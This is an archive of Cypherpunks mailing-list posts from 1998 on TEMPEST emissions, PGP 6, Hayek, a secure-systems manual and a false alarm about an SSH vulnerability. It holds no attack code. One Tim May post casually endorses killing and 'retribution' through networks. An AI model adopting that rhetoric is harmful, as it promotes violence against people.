	As someone who has actually spent hellish weeks working to
suppress the RF emissions of some commericial network gear I designed -
to make it pass FCC B and VDE certification - let me say this is a black
art and no fun.  There are sophisticated electromagnetics programs that
can sometimes succeed in modeling the radiation from a computer system,
but they are very expensive and inputting all the required information
is painful or downright impossible (data just not available or in a
usable format), so this nasty job usually gets done seat of the pants
style using rules of thumb and educated guesses and hard won experiance 
and lots of trial and error.  The job consists of attaching lossy
ferrite beads, copper tape and other RF and common mode current supressing
devices, shielding plastic packages with spray metallic coatings, adding
screws and other fasteners to bond stuff together better, changing
grounding around within the box to put RF currents in places they don't
get to the outside of the package, use of  ICs that switch more
softly, adding filters to connectors for external cables, changing
layout of PC boards to better shield hot traces, changing the shape of
the metal chassis to act as a better shield and ground plane  and so
forth.  And unless one has access to the best modeling programs, predicting
exactly what a given change will do is a really obscure art...

	Nobody does this using ordinary radios and TVs, the standard
tool is a broadband spectrum analyzer or special EMC receiver with
quasipeak filters and special calibrated wideband dipole antennas that
have known gain and pattern characteristics.  Isolating of radiating
sites is often done with near field probes or sniffers attached to the
spectrum analyzer that allow hot spots to be tracked to within a few cm.
Often in order to get enough sensitivity one also needs special
preamps, and a RF quiet site where signals from the DUT aren't drowned
out by pagers and cellphones and emissions from nearby computers.   A
good bit of this work is done way out in the country under non-metallic
fiberglass buildings that don't create reflections that confuse the
measurements.   And conducted as opposed to radiated noise is measured
with special power line filters and cable filters...

	The magic of the NSA TEMPEST specs lies in exactly how much
certain emissions must be suppressed to lie below useful detectablity
thresholds at some reasonable distance.  And much of the classified trickery
resides in exactly what sorts of things have been shown to carry
useable information and at what field strength that information can be
extracted and under what conditions it is not usable.  And because of
the repetitious nature of many information bearing spurious emanations,
there is some signficant emphasis on corellation and averaging out noise
techniques...

	

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weekly Update <ac70@cityscape.co.uk>
Date: Mon, 2 Nov 1998 00:38:04 +0800
To: ListBot Member <cypherpunks@cyberpass.net>
Subject: You have been added to Weekly Update
Message-ID: <909936171.25805.qmail@ech>
MIME-Version: 1.0
Content-Type: text/plain



The owner of this list has moved it to ListBot. If you don't think
you should be on this list, please send a message to
f-1E5791606D4C7F28@listbot.com

The list owner has included the following welcome message:

IMPORTANT NOTICE FOR REGISTER WEEKLY UPDATE SUBSCRIBERS

Dear Reader, 

Some time ago you asked to receive a weekly update of stories in The
Register. Earlier this year The Register switched to continuous
publication, and introduced a second mailing list for people wishing to
receive daily story updates.

Although we have been maintaining both lists, the mechanism is cumbersome,
and we have now decided to merge them. This will take place in the next
two weeks, after which you should receive notification of 15-20 stories a
day.

Should this not be acceptable, please mail reg@lettice.demon.co.uk a
message with the heading UNSUBSCRIBE

Should you be happy with this, no action on your part is required. 

Note that daily updates will not commence on this list for two weeks.

Note also that although it will be possible to use the Listbot button on
The Register front page to unsubscribe once the lists are merged, you
cannot do so yet. If you wish to unsubscribe at the moment, mail
reg@lettice.demon.co.uk as detailed above.

Thank you for your support.

-----------------------------------------------------------------
This message was sent via ListBot.  To remove yourself
from this list, please visit http://www.listbot.com/remove.html
-----------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 2 Nov 1998 00:16:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: info PGP from France
In-Reply-To: <Version.32.19981101131054.00eed100@mail.capway.com>
Message-ID: <199811011544.QAA25390@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



  > The PGP 6.0 Manual is available in french

Y'know, I have yet to see a rational (non-marketing-speak) explanation
of the advantages of switching to PGP 6.0...

PGP 5.x appears to have no advantages over 2.6x, but when Windoze
users began to "upgrade" to it, we had to rewrite our mailing list
code, as -- of course -- it's mostly incompatible with 2.6x.

Its other primary features -- public keys the size of Mack trucks,
dog-slow decryption rates, and more complicated key management --
hardly count as advantages.

So what's 6.0 got?  Total incompatibility with previous versions?
10 MB executables?  An additional bloatware serving "on the side"?

Pah!  It looks as if PGP today has more in common with Micro$oft Turd
than the nice little "privacy for the masses" programme Phil wrote.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 2 Nov 1998 07:34:48 +0800
To: cypherpunks@cyberpass.net
Subject: H-WEB: De Long on Scott, Planning & Hayek
Message-ID: <v04020a0db26298266fab@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Sun, 1 Nov 1998 01:37:43 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      H-WEB: De Long on Scott, Planning & Hayek
To: HAYEK-L@MAELSTROM.STJOHNS.EDU
Status: U

>>  Hayek On The Web  <<   --   Modernism  /  Government Planning

J. Bradford De Long, "Not Seeing One's Intellectual Parents"

On the Web at:

http://econ161.berkeley.edu/Econ_Articles/Reviews/Seeing_Like_a_State.html


>From the review:

"There is a lot that is excellent in James Scott's _Seeing Like a State_.  It
begins with a romp through eighteenth- and nineteenth-century German
forestry--and the failure of the foresters to understand the ecology of the
forests that they were trying to manage.  It continues with a brief digression
on how states tried to gain control of their populations through maps,
boulevards, and names.  These are prequels to a vicious and effective critique
of what Scott calls "high modernism": the belief that the planner--whether Le
Corbusier designing a city, Vladimir Lenin designing a planned economy, or
Julius Nyerere "villagizing" the people of Tanzania--knows best, and can move
humans and their lives around on as if on a chessboard to create utopia.

Then the focus appears to waiver.  There is a chapter on agriculture in
developing economies that characterizes agricultural extension efforts from
the first to the third world as analogous to Lenin's nationalization of
industry, or Nyerere's forced resettlement of Tanzanians.  But the targets --
the agricultural extenders who dismiss established practices -- lose solidity
and become shadows. They are no longer living, breathing, powerful rulers,;
instead they are the "credo of American agriculture," the "catechism of high-
modernist agriculture," the "high-modernist aesthetic and ideology of most
colonial trained agronomists and their Western-trained successors" -- truly
straw men.

The conclusion is a call for social systems that recognize the importance of
what Scott calls "metis": a Greek word for the practical knowledge that a
skilled and experienced worker has of his craft.  Most such practical
knowledge cannot be easily summarized and simple rules, and much of it remains
implicit: the devil is in the details. T he key fault of "high modernism," as
Scott understands it, is its belief that details don't matter -- that planners
can decree from on high, people obey, and utopia result.

Well before the end of the book an economist is struck by a strong sense of
deja vu. Scott's declarations of the importance of the detailed practical
knowledge possessed by the person-on-the-spot -- of how such knowledge cannot
be transmitted up any hierarchy to those-in-charge in a way to do any good--of
how the locus of decision-making must remain with those who have the craft to
understand the situation--of how any system that functions at all must create
and maintain a space in which there is sufficient flexibility for craftsmen to
exercise their metis (even if the hierarchs of the system pretend not to
notice this flexibility)--all of these strike an economist as very, very
familiar.

All of these seem familiar to economists because they are the points made by
Ludwig von Mises (1920) and Friedrich Hayek (1937) and the other Austrian
economists in their pre-World War II debate with socialists over the
possibility of central planning.  Hayek's adversaries--Oskar Lange and
company--argued that a market system had to be inferior to a centrally-planned
system: at the very least, a centrally-planned economy could set up internal
decision-making procedures that would mimic the market, and the central
planners could also adjust things to increase social welfare and account for
external effects in a way that a market system could never do.  Hayek, in
response, argued that the functionaries of a central-planning board could
never succeed, because they could never create both the incentives and the
flexibility for the people-on-the-spot to exercise what Scott calls metis.

Today all economists--even those who are very hostile to Hayek's other
arguments (that government regulation of the money supply lies at the root of
the business cycle, that political attempts to reduce inequalities in the
distribution of income lead to totalitarianism, that the competitive market is
the "natural spontaneous order" of human society) -- agree that Hayek and
company hit this particular nail squarely on the head.  Looking back at the
seventy-year trajectory of Communism, it seems very clear that Hayek (and
Scott) are right: that its principal flaw is its attempt to concentrate
knowledge, authority, and decision-making power at the center rather than
pushing the power to act, the freedom to do so, and the incentive to act
productively out to the periphery where the people-on-the-spot have the local
knowledge to act effectively.

In short, by the end of his book James Scott has argued himself into the
intellectual positions adopted by Friedrich Hayek back before World War II.
Yet throughout the book Scott appears to be ignorant that the intellectual
terrain which he has reached has already been well-explored.

This is quite distressing ... "

J. Bradford De Long, "Not Seeing One's Intellectual Parents".  Review of
James Scott (1998), _Seeing Like a State: How Certain Schemes to Improve the
Human Condition Have Failed_. (New Haven: Yale University Press).   7/4/1998

------------------------------------------------------------------------------
--

References

Peter Boettke (1990), The Political Economy of Soviet Socialism (Boston:
Kluwer Academic Publishers: 0792391004).

Friedrich Hayek, ed. (1935), Collectivist Economic Planning: Critical Studies
on the Possibility of Socialism (London: Routledge: 0678007659).

Friedrich Hayek (1937), "Economics and Knowledge," Economica 4, pp. 33-54.

Friedrich Hayek (1945), "The Use of Knowledge in Society," American Economic
Review 35, pp. 519-30.

Frank Knight (1936), "The Place of Marginal Economics in a Collectivist
System," American Economic Review 26:2, pp. 255-6.

Abba Lerner (1934), "Economic Theory and Socialist Economy," Review of
Economic Studies 2, pp. 51-61.

James Scott (1998), Seeing Like a State: How Certain Schemes to Improve the
Human Condition Have Failed (New Haven: Yale University Press: 0300070160).

Ludwig von Mises (1920), "Die Wirtschaftsrechnung im sozialistischen
Gemeinwesen," Archiv fur Sozialwissenschaften und Sozialpolitik 47:1, pp.
86-121."

------------------------------------------------------------------------------
--


Professor of Economics J. Bradford De Long, 601 Evans Hall, #3880
University of California at Berkeley
Berkeley, CA 94720-3880
(510) 643-4027 phone (510) 642-6615 fax
delong@econ.berkeley.edu
http://econ161.berkeley.edu/




Hayek On The Web is a regular feature of the Hayek-L list.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Nov 1998 09:52:15 +0800
To: cypherpunks@toad.com
Subject: NOT the Orange Book
Message-ID: <199811020104.UAA18004@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul Merrill, the author of "NOT the Orange Book," has
provided a digital version of his "Guide to the Definition, 
Specification, Tasking, and Documentation for the 
Development of Secure Computer Systems -- Including 
Condensations of the Members of the Rainbow Series 
and Related Documents:" 

   http://jya.com/ntob.htm  (385K)

Zipped:

   http://jya.com/ntob.zip  (92K)

This is Paul's 1992 manual prepared while working for 
DoD to evaluate and purchase secure computer systems,
for ADP, C4I and weapons, and to compensate for the 
shortcomings of the official regulations. 

It's still widely used, Paul says, for the unending conflict 
between DoD, NSA, DIA and defense contractors about
how to develop and assure computer security from lab rat
pipedream to the warfighter's "wha's this piece of shit."

Section IV, Case Studies, is a wonder at describing what
to do when perfect design goes to hell in the field, and a 
pissed warrior who's comm's been compromised got a 
K-Bar sawing your apple, roaring "tech support, now!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PHM@sprynet.com>
Date: Mon, 2 Nov 1998 10:13:33 +0800
To: John Young <jya@pipeline.com>
Subject: Re: NOT the Orange Book
In-Reply-To: <199811020104.UAA18004@camel8.mindspring.com>
Message-ID: <363D3654.AA1AF05E@sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



While I perhaps would not have phrased things in quite the same colorful
manner, John Youngs commentary here is substantially correct.  The
intent however was to hellp the developers develop systems that would
preclude the need for K-Bars.

PHM

John Young wrote:
> 
> Paul Merrill, the author of "NOT the Orange Book," has
> provided a digital version of his "Guide to the Definition,
> Specification, Tasking, and Documentation for the
> Development of Secure Computer Systems -- Including
> Condensations of the Members of the Rainbow Series
> and Related Documents:"
> 
>    http://jya.com/ntob.htm  (385K)
> 
> Zipped:
> 
>    http://jya.com/ntob.zip  (92K)
> 
> This is Paul's 1992 manual prepared while working for
> DoD to evaluate and purchase secure computer systems,
> for ADP, C4I and weapons, and to compensate for the
> shortcomings of the official regulations.
> 
> It's still widely used, Paul says, for the unending conflict
> between DoD, NSA, DIA and defense contractors about
> how to develop and assure computer security from lab rat
> pipedream to the warfighter's "wha's this piece of shit."
> 
> Section IV, Case Studies, is a wonder at describing what
> to do when perfect design goes to hell in the field, and a
> pissed warrior who's comm's been compromised got a
> K-Bar sawing your apple, roaring "tech support, now!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 2 Nov 1998 23:23:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops
Message-ID: <v03130319b262f2ef8cfa@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:26 PM -0800 11/1/98, Dave Emery wrote:
>On Sun, Nov 01, 1998 at 09:53:37AM -0800, Tim May wrote:
>>
>> Anyway, were I to try to shield a laptop I'd start with microwave leakage
>> meters, a couple of t.v.s and radio (of different types and bands), and
>> then I'd start recording signal levels of various sorts as different
>> shielding layers and types were applied to the laptop(s). Simple lab stuff.
>>
>
>	As someone who has actually spent hellish weeks working to
>suppress the RF emissions of some commericial network gear I designed -
>to make it pass FCC B and VDE certification - let me say this is a black
>art and no fun.  There are sophisticated electromagnetics programs that
>can sometimes succeed in modeling the radiation from a computer system,
>but they are very expensive and inputting all the required information
>is painful or downright impossible (data just not available or in a
>usable format), so this nasty job usually gets done seat of the pants
>style using rules of thumb and educated guesses and hard won experiance
>and lots of trial and error.  The job consists of attaching lossy
>ferrite beads, copper tape and other RF and common mode current supressing
>devices, shielding plastic packages with spray metallic coatings, adding
...

All good points, but there's a big difference between trying to meet FCC
emissions requirements for a commercial product that has to meet cost,
weight, and cosmetic requirements (e.g., a plastic case!), and the scenario
of making a TEMPEST-like box for a laptop. Ferrite beads and copper tape
are a lot different from a sealed box made of 10-gauge copper sheet.

>	Nobody does this using ordinary radios and TVs, the standard
>tool is a broadband spectrum analyzer or special EMC receiver with
>quasipeak filters and special calibrated wideband dipole antennas that
>have known gain and pattern characteristics.  Isolating of radiating
>sites is often done with near field probes or sniffers attached to the
>spectrum analyzer that allow hot spots to be tracked to within a few cm.
>Often in order to get enough sensitivity one also needs special
>preamps, and a RF quiet site where signals from the DUT aren't drowned
>out by pagers and cellphones and emissions from nearby computers.   A
>good bit of this work is done way out in the country under non-metallic
>fiberglass buildings that don't create reflections that confuse the
>measurements.   And conducted as opposed to radiated noise is measured
>with special power line filters and cable filters...

Sure, but my point was that John Young should *at least* start with actual
measurements, as opposed to putting most of the onus on a FOIA request to
get TEMPEST docs declassified.

If he can get spectrum analyzers and all that stuff, so much the better.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 2 Nov 1998 05:38:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: info PGP from France
In-Reply-To: <199811011544.QAA25390@replay.com>
Message-ID: <Pine.BSF.3.96.981101215826.17974A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 1 Nov 1998, Anonymous wrote:

> 
>   > The PGP 6.0 Manual is available in french
> 
> Y'know, I have yet to see a rational (non-marketing-speak) explanation
> of the advantages of switching to PGP 6.0...

You should read Cypherpunks more regularly. This is what I posted in the
past:

Quick PGP 6 eval
===============

Long desired features:
o Designated revokers (If you are incapacitated/incarcerated).
o Secret shared keys (A must for corporate root keys).

Gimmick:
o You can attach a photo to your key.  

Still not there:
o Ability to revoke individual user ID's on a key.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 2 Nov 1998 23:15:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops
In-Reply-To: <3.0.5.32.19981101142536.008aee30@idiom.com>
Message-ID: <v0313031bb2630800850c@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:32 PM -0800 11/1/98, Lucky Green wrote:
>On Sun, 1 Nov 1998, Bill Stewart wrote:
>[...]
>> Just using a regular laptop isn't enough; I've seen laptops
>> transmit recognizable images to a television (though I was probably
>> using AC power rather than batteries, and may or may not have had
>> the display mode set to LCD-and-monitor.)
>
>Thanks for touching on the popuar myth that laptops radiate less than
>CRT's. Many laptops in fact radiate more compromising emissions than
>CRT's. Ross Anderson does his van Eck demos to undergrads using a laptop,
>because it works so much better than CRT's.

But laptops are certainly smaller than desktops + monitors are, and can be
run off of batteries. This makes laptops better candidates for a sealed box
commercial product.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 2 Nov 1998 23:15:39 +0800
To: cypherpunks@cyberpass.net
Subject: Computers as instruments of liberation
Message-ID: <v0313031cb2630c8c97f1@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



"Wired News" carried an article reporting on a plan to  (somehow) spread
computers around the world, blah blah, and quoting John Gage at Sun on how
this would promote peace.

A couple of paragraphs have Cypherpunks resonances"

--begin excerpt--

Conference tackles ``techno-inequality''

By Judy DeMocker

SAN FRANCISCO (Wired) - When US farmers can call their cows home
individually using animal pagers, but the average teenager in Burkina Faso
has never made a
.....
Wiring developing nations could have some far-reaching consequences. One
might be that computer-based communications would be used to keep the
peace, according Net
Day co-founder John Gage, who works by day as Sun Microsystems' chief
scientist. When content from The New York Times can be translated into 30
Arab dialects, for
example, or when a remote Rawandan village has access to more perspectives
than the local magistrate, the Internet may become an instrument in
preventing violence.

``The Web gives people access to other voices, and instant access to
speaking about how the world really is,'' said Gage. ''If people can get
that, maybe that band of villagers
will think twice before going down the road and killing its neighbors.''

--end excerpt--

Fatuous nonsense. After all, those folks down the road may be taxing them,
and may need killing. Or those folks may use computer networks to connect
to others for the purposes of liberation.

I see computer networks as promoting secessionism, freedom fighting, and
resistance in general.

The New World Order, the One Worlders, see this as "terrorism."

Which is why strong encryption is needed. Which is why "they" oppose strong
encryption.

John Gage has a typically Fabian socialist view that somehow
computerization will lead to an orderly, peaceful world.

Me, I view networks as  the key to retribution and justice.

--Tim May


Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 2 Nov 1998 23:23:11 +0800
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: [humor] Testing software
Message-ID: <199811020422.XAA11460@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain




A friend of mine sent me the following:

We are in the process of testing the new piece of software we designed:


> AGGRESSION TESTING: If this doesn't work, I'm gonna kill somebody.
> 
> COMPRESSION TESTING:  []
> 
> CONFESSION TESTING: Okay, Okay, I did program that bug.
> 
> CONGRESSIONAL TESTING:  Are you now, or have you ever been a bug?
> 
> DEPRESSION TESTING: If this doesn't work, I'm gonna kill myself.
> 
> EGRESSION TESTING: Uh-oh, a bug... I'm outta here.
> 
> DIGRESSION TESTING: Well, it works, but can I tell you about my truck...
> 
> EXPRESSION TESTING: #@%^&*!!!, a bug.
> 
> OBSESSION TESTING: I'll find this bug if it's the last thing I do.
> 
> OPPRESSION TESTING:  Test this now!
> 
> POISSON TESTING:  Alors!  Regardez le poisson!
> 
> REPRESSION TESTING: It's not a bug, it's a feature.
> 
> SECESSION TESTING: The bug is dead!  Long live the bug!
> 
> SUGGESTION TESTING: Well, it works but wouldn't it be better if...

Added by JFA:

DELUSION TESTING: Naahhhh, don't loose any time doing any testing, it'll 
work...


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 2 Nov 1998 10:01:42 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: TEMPEST laptops
In-Reply-To: <3.0.5.32.19981101142536.008aee30@idiom.com>
Message-ID: <Pine.BSF.3.96.981102022851.18391A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 1 Nov 1998, Bill Stewart wrote:
[...]
> Just using a regular laptop isn't enough; I've seen laptops
> transmit recognizable images to a television (though I was probably
> using AC power rather than batteries, and may or may not have had
> the display mode set to LCD-and-monitor.)

Thanks for touching on the popuar myth that laptops radiate less than
CRT's. Many laptops in fact radiate more compromising emissions than
CRT's. Ross Anderson does his van Eck demos to undergrads using a laptop,
because it works so much better than CRT's.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <secret_squirrel@nym.alias.net>
Date: Mon, 2 Nov 1998 11:02:16 +0800
To: cypherpunks@cyberpass.net
Subject: Hacktivists
Message-ID: <3cf9668e2576c48ac6aa50e9297fd2a3@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



"HACKTIVISTS" SAY: "THE REVOLUTION WILL BE DIGITIZED"

Two political activists in New York, of cofounders of the 
Electronic Disturbance Theater, are organizing "virtual sit-ins"
and recruiting programmers to attack the Web sites of persons or
organizations they believe responsible for oppression.  "We see 
this as a form of electronic civil obedience," says Stefan Wray,
one of the two leaders of this effort. National Information 
Protection Agency chief Michael Vatis says, "I wouldn't
characterize vandalizing Web sites as cyber-terrorism, but the 
only responsible assumption we can make is that there's more 
going on that we don't know about."  Some activists agree with 
that assessment, but for different reasons;  they think such 
methods are unproductive because they will antagonize the 
general public.  (New York Times 31 Oct 98)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 2 Nov 1998 23:16:04 +0800
To: cypherpunks@toad.com
Subject: RE: 4 Horseman not so bad..
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8553@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:

>>>  but some peope are scared of
> >>> drugs/paedophiles/terrorists etc, so thats the way in for the
> jackboots. 
> >>> To oppose it we need to reduce fear. 
> 
Chip wrote:

>>Thats the most interesting POV I've ever heard
>>of in these discussions, seems like for the most part, 
>>we counter fear arguments with other fear arguments,
>>Never saw this before. Bears more examination.

Anon wrote:

> Right.  The new Happy Net campaign.
> Druggies.. why, they're friendly enough to
> be elected officials in such peaks of civilization as
> D.C. and L.A. And the more successful recreational
> pharmaceutical merchants are luxury-car and mobile
> telecomm early adopters!

London is full of spy cameras (mostly owned by banks and large
corporations, pointing out from their windows and doors) Nobody much
objects to the invasion of privacy.  Why? Because lots of them are
scared of the streets.  If they knew the actual chance of getting robbed
or beaten up  they probably wouldn't be so scared.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 2 Nov 1998 23:33:23 +0800
To: cypherpunks@cyberpass.net
Subject: No vulnerability known in SSH-1.2.26
Message-ID: <v04020a0fb2634a30c7a9@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Mon, 2 Nov 1998 10:33:29 +0200 (EET)
From: Tatu Ylonen <ylo@ssh.fi>
To: ssh@clinet.fi, ssh-bugs@clinet.fi, bugtraq@netspace.org,
        info@rootshell.com, coderpunks@toad.com
CC: "David A. Curry" <davy@ers.ibm.com>, cert@cert.org, auscert@auscert.org.au
Subject: No vulnerability known in SSH-1.2.26
Organization: SSH Communications Security, Finland
Sender: owner-coderpunks@toad.com
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

As the original author of SSH I want to comment on the rumored
vulnerabilities.

I have personally looked into the claimed vulnerabilities, including
the ones reported by IBM, and do not have any reason to assume that
there would be any vulnerability in ssh-1.2.26.  NO SUCH VULNERABILITY
IS KNOWN.

I repeat, I KNOW OF NO VULNERABILITY IN SSH-1.2.26.

The IBM-ERS report on ssh vulnerability turned out to be false alert.
They could not reproduce it after they recompiled their ssh and linux
kernel.

I have personally checked all places where ssh displays debugging
messages, log messages, or otherwise uses functions like sprintf.  I
was unable to find any vulnerabilities.

I have talked to people at both CERT and the IBM emergency response
service and none of them seems to have any knowledge of any
vulnerability in SSH.

In summary, to my best knowledge, ssh-1.2.26 can be safely used.

Please communicate this information to the relevant people.

Brief history of events:

  - On October 28, the rootshell.com home page was defaced by
    hackers.  After the host was brought up to date, their front page
    contained information that listed the services that had been
    active, and mentioned that entry may have been made with ssh.
    (Note that this does not by itself indicate anything; password or
    other authentication may have been obtained at the other end)

  - On October 29, a message about the rootshell case is posted to
    bugtraq and possibly other mailing lists.  Many people took this
    as indication of a vulnerability in ssh.

  - We looked at the rootshell case, and found no cause for alarm, but
    decided to be watching.

  - On October 30, IBM sent an draft advisory reporting a buffer overflow
    vulnerability that could be used to gain root access to any host
    running ssh from anywhere on the Internet.  The draft advisory was
    sent to at least CERT, FIRST, ssh-bugs, and a few other places.

  - On october 30, several major computer manufacturers and their
    offices around the world were advising their customers to follow
    the situation, and possibly disable ssh for now.  Some CERTs
    around the world issued preliminary alerts to their most important
    sites.

  - I learn of the IBM advisory on October 31 at 2 AM.  By 6 AM I've
    talked to both CERT and IBM Emergency Response Team, checked the
    code claimed to be at fault (finding no problem), and no-one seems
    to have any concrete information, and we conclude there is no
    cause for immediate alarm.

  - By November 1, the IBM researchers who found the vulnerability in
    the IBM draft advisory have been reached.  One of them says he
    never saw an exploit, and the other first said he had an exploit
    and he was going to send it over shortly, and the next day he said
    that he could no longer reproduce the problem after recompiling
    ssh.  He does not appear to have an exploit after all.

  - I've personally gone through all places where ssh1 passes
    information to sprintf, log_msg, or any other functions using
    sprintf.  I found no security problems.  I found one place where
    an argument to a format string was missing, but it is probably not
    exploitable, and one place where one byte less was allocated for a
    string than was used (only appears on Solaris).  Neither of these
    have security consequences or are cause for alarm.

  - On November 1, the IBM announcement for which IBM has already issued
    a cancellation is widely distributed by rootshell through their
    announcement list.

  - Now at Morning November 2, I'm convinced (>99% sure) that both
    the rootshell issue and the IBM draft advisory were false alerts.

We are also trying to track down the linux compilation problem that
may have caused the false alert behind the IBM advisory.  We will
issue an announcement as soon as possible if real vulnerability is
found.

For more information, please keep tracking
http://www.ssh.fi/sshprotocols2.

Best regards,

    Tatu Ylonen <ylo@ssh.fi>

- --
SSH Communications Security           http://www.ssh.fi/
SSH IPSEC Toolkit                     http://www.ipsec.com/
Free Unix SSH                         http://www.ssh.fi/sshprotocols2/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNj1tbqkZxfGWH0o1AQEaLwP+LPhkCOGFs30gfbyjMLLMkNp03OOfpALJ
uwqBvLPIntIWhHbjq1GF9D3hekyQ3PdiC+5SEBfFBj1xlAg1SPROJ2JV5d2QHuPm
B39j3YuQSJT5j/QXN0nkbP7ll9UoPJ9eMWBQvd5Hgf//eAk6ccns4fUqensMypeR
9J3O2JQG6ow=
=gesm
-----END PGP SIGNATURE-----

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 3 Nov 1998 00:01:25 +0800
To: PaulMerrill@acm.org
Subject: orange book
Message-ID: <363DCA2B.7C4E@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Monday 11/2/98 7:55 AM

PaulMerrill@ACM.Org

I looked at the orange book at NOT the Orange Book -
http://www.jya.com/ntob.htm

NSA employee Tom White http://jya.com/nsasuit.txt got me a copy of I was
told was
THE NSA orange book for Sandia's implementation of the NSA Benincasa 
nss/uso authentication algorithm..

The report I saw was concerned about implementation of cryptographic
units.

Things like shielding, power filtering, red-black boundaries, shift
register 
compromising signals, some software guidelines,....  The soft-cover
report was mostly 
hardware-oriented.

What I see at jya.com is not the orange book Sandia was given.

bill payne

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
